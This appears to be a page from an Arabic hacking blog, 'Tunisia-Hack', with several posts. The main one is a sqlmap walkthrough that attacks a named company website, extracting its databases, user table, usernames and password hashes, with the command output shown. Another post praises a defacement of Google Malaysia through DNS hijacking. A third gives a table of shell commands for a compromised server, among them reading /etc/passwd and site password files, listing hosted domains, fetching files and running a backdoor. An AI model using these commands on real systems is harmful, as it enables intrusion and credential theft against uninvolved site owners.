How To Uplaod Shell Via PhpMyAdmin

Fun to watch

by  Xhackertn

أكمل القراءة

شرح اختراق مواقع بستعمال sqlmap

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
  الكل يعرف انه ثغرات sql
 من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته
psyco-hacker

مشاهدة ممتعة
 

أكمل القراءة

إختراق نطاق غوغل

قام أحد قراصنة المجموعة الباكستانية madleets يطلق على نفسه اسم ''1337''باختراق أو بالأحرى تشويه الواجهة الرئيسية لغوغل ماليزيا قبل ساعات قليلة من الآن و ليس هناك سبب وراء هذا الإختراق. 

حيث عمد الهاكر في هجومه على طريقة تشويه المواقع عبرDNS Hijacking  فيبدو كأنه تم اختراق غوغل و هي طريقة ناجحة لتشويه المواقع وقد تم إعتمادها من قبل المجموعة الفلسطينية التي كانت مؤخرا وراء إختراق كل من AVG,AVIRA,WHATSAPP بالإضافة إلى موقع alexa.

و جدير بالذكر ان الهاكر ''1337'' قام قبل أسابيع قليلة باختراق غوغل كينيا و غوغل بروندي وقد  شارك في اختراق فروع أكبر الشركات العالمية مثل Twitter, Toyota, Orange, norton, oracle, ibm, cisco,  بسيطرته على محول النطاقات الرئيسي في دولة بروندي ، بالإضافة لاختراقه للبنك الرئيسي بأفغانستان  في شهر مارس .

و في حين كتابة هذا التقرير فإن غوغل قد قامت بإصلاح المشكل .

نطاقات غوغل المخترقة :www.google.my
www.google.com.my

تسجيل الإختراق:
http://www.zone-h.com/mirror/id/20957809
http://www.zone-h.com/mirror/id/20957806

psyco-hacker :)

أكمل القراءة

How to find SQL injection in website

Tutorial By psyco-hacker

t00l: i wont share it :D only with my team :)

أكمل القراءة

خدع جوجل ربما لم ترها من قبل

بسم الله الرحمان الرحيم

السلام عليكم ورحمة الله وبركاته

الكثير من الناس يستعملون محرك البحث جوجل لكن القليل منهم يعرفون هذهالخدع من جوجل التي سنراها في هذا الموضوع .

1- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ tilt ” واضغط Entrer .

2- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ do a barrel roll ” واضغط Entrer.

3- قم بالدخول لمحرك البحث Google واكتب العبارة التالية  “ zerg rush  ”  واضغط Entrer.

4-  قم بالدخول لمحرك البحث Google واكتب العبارة التالية“ Google Gravity”واضغط ضربة حظ او J'ai de la chance.

5- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ Google Mirror ” واضغط ضربة حظ او J'ai de la chance.

6- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “Google Terminal” واضغط ضربة حظ او J'ai de la chance.

ارجوا ان ينال الموضوع اعجابكم .

أكمل القراءة

اوامر الشيل

بسم الله الرحمان الرحيم

مرحباً بكم زوار مدونة تونيزيا هاك

الرجاء نسخ الكتابة  لعدم اتساع الصفحة

أوامر الضغط وفك الضغط
مثـال	الأمر	وظيفة الأمر
qzip failname	qzip	zip  أمر الضغط بامتداد
unzip failname	unzip	zip امر فك الضغط بامتداد
tar -zcf zz.tar daily	tar -zcf	tar  أمر الضغط بامتداد
tar -zxf zz.tar	tar -zxf	tar أمر فك الضغط بامتداد
tar -czvf file name.tar.gz file name.sql	tar -czvf	gz أمر ضغط الملف بامتدا
gzip -d file.gz	gzip -d	gz فك الضغط بامتداد
tar -czvf file name.tar.gz file name.sql	tar -czvf	كيفية ضغط قاعدة البيانات
tar -zxvf file name.tar.gz	tar -zxvf	كيفية فك قواعد البيانات
tar -czvf /home/user/public_html/n3.tar.gz n3	tar -czvf	tar.gz  امر ضغط المجلدات بامتداد

أوامر الداخلية
مثـال		الأمر	وظيفة الأمر
ls		ls	استعراض الملفات
ls		ls -la	استعراض الملفات والمجلدات المخفية والتصاريح
pwd		pwd	تحديد المكان علىالسيرفر
ls;pwd		;	اداة الربط بين الأوامر
wget http://xxxx.com/xxx.zip		wget	أمرالسحب
curl -o ./xxx.zip http://xxxx.com/xxx.zip		curl -o ./	امر السحب الآخر
history		history	أمر معرفة جميع الأوامر التي نفذت بالشل
mkdir shuooon		mkdir	انشاء مجلد جديد
rm failname		rm	أمر الحذف
rm -r dir		rm -r	حذف مجلد بجميع الملفات
edit failname		edit	أمر التعديل
who		who	امر التصلين على السيرفر
cd		cd	امر دخول المجلدات
cd ..		cd ..	امر العودة للخلف
mv		mv	امر اعادة التسمية
find		find	امر البحث
./		./	أمر تشغيل الباك دور
uname -a		uname -a	أمر معرفة اصدار السيرفر
ls ftp.zip*		*	امر يرمز للكل
man ls		man	امر المساعدة
drwxrwxrwx	chmod 777 file	chmod	أمر إعطاء التصريح
touch file.php		touch	أمر انشاء ملف فارغ
gcc xxx.c -o xxx		gcc	ترجمة الكومبايل او الاكسبلويت
usr/bin/perl  يبدأ الكود بهذه الكلة		لا يحتاج ترجمة	ملفات البيرل تبدأ بــ
include يبدأ الكود بهذه الكلة		ترجمة وتشغيل فقط	ملفات السي تبدأ بــ
أوامر  الخارجية
مثال		الأمر	وظيفة الأمر
cat /home/*/public_html/_vti_pvt/access.cnf		cat	عرض جميع المواقع التي على السيرفر
cat /home/*/public_html/_vti_pvt/service.pwd		cat	عرض جميع الباسووردات على السيرفر
cat /usr/local/apache/conf/httpd.conf		cat	لمعرفة عرض مصدر السيرفر
find / -name httpd.conf		find	عرض المصدر
more /etc/userdomains		more	CAT امر مشابة للأمر
pico /home/burst/public_html/index.html		pico	تحرير النصوص
vi /home/burst/public_html/index.html		vi	امر تحرير به الكثير من المزايا لكنه اصعب من السابق
valiases  المهم نحدد	ls -la /etc/valiases	ls	معرفة المواقع اللي على السيرفر مع اليوزر
ls /var/named		ls	معرفة جميع المواقع اللي على السيرفر
valiases  المهم نحدد	ls /usr/local/psa/home/vhosts/	ls	معرفة جميع المواقع على السيرفر
perl file.pl		perl	تشغيل البيرل
cat /etc/passwd	ابحث عن bash	cat	امر استخراج حسابات الشل

إلى القاء في موضوع قادم

© Tunisia-Hack

أكمل القراءة